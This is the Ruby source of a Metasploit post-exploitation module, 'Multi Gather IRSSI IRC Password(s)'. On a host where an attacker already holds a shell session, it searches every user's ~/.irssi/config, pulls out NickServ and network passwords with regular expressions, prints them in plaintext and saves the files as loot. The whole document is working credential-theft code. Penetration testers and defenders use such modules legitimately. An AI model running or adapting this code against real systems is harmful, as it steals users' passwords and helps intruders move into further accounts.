metasploit-framework/modules/post/multi/gather/irssi_creds.rb

84 lines
2.1 KiB
Ruby

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Unix
def initialize(info = {})
super(update_info(info,
'Name' => 'Multi Gather IRSSI IRC Password(s)',
'Description' => %q{
This module grabs IRSSI IRC credentials.
},
'Author' => [
'Jonathan Claudius <jclaudius[at]mozilla.com>',
],
'Platform' => %w{bsd linux osx unix},
'SessionTypes' => %w{shell},
'License' => MSF_LICENSE
))
end
def run
print_status('Finding ~/.irssi/config')
paths = enum_user_directories.map { |d| d + '/.irssi/config' }
paths = paths.select { |f| file?(f) }
if paths.empty?
print_error('No users found with a ~/.irssi/config file')
return
end
download_passwords(paths)
end
# Example of what we're looking for in the config...
#
# ***Identify Password Example***
# autosendcmd = "/msg nickserv identify example_password ;wait 2000";
#
# ***Network Password Example***
# password = "example_password";
#
def contains_passwords?(path)
data = read_file(path)
identify_passwords = data.scan(/\/\^?msg nickserv identify ([^\s]+)/)
network_passwords = data.scan(/^?password = "([^\s]+)"/)
passwords = identify_passwords.flatten + network_passwords.flatten
if passwords.any?
print_good("Found IRC password(s) of #{passwords.join(',')} in irssi config at #{path}")
return true
end
false
end
def download_passwords(paths)
print_status "Looting #{paths.count} files"
paths.each do |path|
path.chomp!
next if ['.', '..'].include?(path)
if contains_passwords?(path)
loot_path = store_loot(
'irssi config file',
'text/plain',
session,
read_file(path),
path,
'IRC Password'
)
print_good("irssi config with passwords stored in #{loot_path}")
end
end
end
end